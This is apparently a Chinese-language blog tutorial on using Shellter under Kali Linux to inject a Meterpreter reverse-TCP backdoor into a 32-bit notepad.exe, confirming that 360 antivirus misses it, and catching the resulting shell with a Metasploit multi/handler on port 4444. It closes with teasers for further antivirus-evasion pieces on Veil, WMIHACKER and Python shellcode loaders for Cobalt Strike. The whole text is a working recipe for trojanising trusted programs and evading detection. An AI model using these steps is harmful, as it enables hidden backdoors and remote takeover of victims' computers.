shellter 是一款動態 shellcode 注入工具,我們可以將shellcode注入到其它程式上,從而來躲避防毒軟體的查殺。俗稱為免殺
官網: 目前最新版本是7.2,主程式是.exe檔案所以在windows下可以直接使用,在linux上執行的話
就需要安裝wine環境來執行。我使用的kali linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可執行檔案
開始安裝:
1. apt-get update //更新一下
安裝完成後 ,終端直接輸入shellter開啟會報錯,根據提示 我們直接執行命令dpkg --add-architecture i386 && apt-get update && apt-get install wine32
確認安裝即可
現在我們開啟shellter就可以開啟執行了,工具安裝完成後再/usr/share/windows-resources/shellter 這個資料夾
shellter目錄下的shellter_backups資料夾是你注入檔案後備份的資料夾,會自動把原檔案備份乙個到這個資料夾下。
免殺實驗:
choose operation mode - auto/manual (a/m/h):a //選擇模式 a 自動模式自動注入後門,m高階模式,h幫助
pe target:/home/notepad.exe // 注入的程式 這裡已windows系統自帶的32位記事本程式舉例
enable stealth mode? (y/n/h): y //是否啟用隱身模式 輸入y啟用
use a listed payload or custom? (l/c/h): l //使用攻擊模組列表或者自定義? 輸入l 選擇payload
select payload by index: 1 //選擇第乙個
set lhost: 192.168.37.137 //設定**回來的ip 本機
set lport:4444 //設定接收**的埠
這樣我們的木馬後門shellcode就注入到這個檔案裡去了,
開啟360全部查殺引擎,更新病毒庫,查殺一下試試效果,沒有任何提示。
開啟msf,進行配置,
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.37.137set lport 4444exploit //監聽
這時執行帶有後門的notepad.exe檔案後,控制端成功連線上來,接下來就可以隨意操作了。
kali下的免殺之veil安裝步驟
3.安裝完kali後,首先更換源,開啟 etc apt source.list 替換成下面 這裡我是更換的kali源但是kaili源有時會崩潰所以大家可以在網上搜尋其他開源 如網易源 deb cdrom debian gnu linux 2016.1 kali rolling official sn...
免殺橫向移動工具WMIHACKER
免殺橫向滲透遠端命令執行,常見的wmiexec p ec執行命令是建立服務或呼叫win32 process.create執行命令,這些方式都已經被殺軟100 攔截,通過改造出wmihacker免殺橫向移動測試工具。其通過135埠進行命令執行,執行的結果讀取以及無需445埠進行檔案傳輸。此工具利用的前...
cs免殺 使用python進行免殺
使用python版本為python3.6 32位版本,64位版本測試會報錯。安裝pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 使用cobalsstrike生成c語言shellcode。shellcode 放這個位置...